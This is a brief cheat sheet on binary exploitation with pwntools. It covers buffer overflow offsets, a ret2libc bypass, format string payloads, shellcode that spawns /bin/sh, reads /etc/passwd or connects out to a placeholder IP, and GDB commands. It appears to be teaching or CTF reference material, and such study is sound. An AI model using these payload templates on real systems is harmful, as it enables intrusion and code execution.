Exploit Development Expert

Binary Exploitation Basics

Buffer Overflow

from pwn import *

Find offset

cyclic(200) # Generate pattern cyclic_find(0x61616166) # Find offset

Basic exploit

offset = 64 ret_addr = p64(0x401234) payload = b'A' * offset + ret_addr

With NX bypass (ret2libc)

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') system = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh'))

Format String

Read from stack

payload = b'%x.' * 20 payload = b'%7$s' # Read specific position

Write to address

payload = fmtstr_payload(offset, {target_addr: value})

Shellcode

Using pwntools

context.arch = 'amd64' shellcode = asm(shellcraft.sh())

Common shellcodes

shellcraft.sh() # /bin/sh shellcraft.cat('/etc/passwd') shellcraft.connect('IP', PORT)

Pwntools Essentials

from pwn import *

Setup

context.binary = ELF('./vuln') context.log_level = 'debug'

Connection

p = process('./vuln') # Local p = remote('ip', port) # Remote p = gdb.debug('./vuln') # With GDB

I/O

p.sendline(payload) p.recvuntil(b'>') data = p.recv(100)

Interactive

p.interactive()

GDB Commands

gdb ./binary

checksec # Security features info functions # List functions disas main # Disassemble b *0x401234 # Breakpoint r < payload.txt # Run with input x/20wx $rsp # Examine stack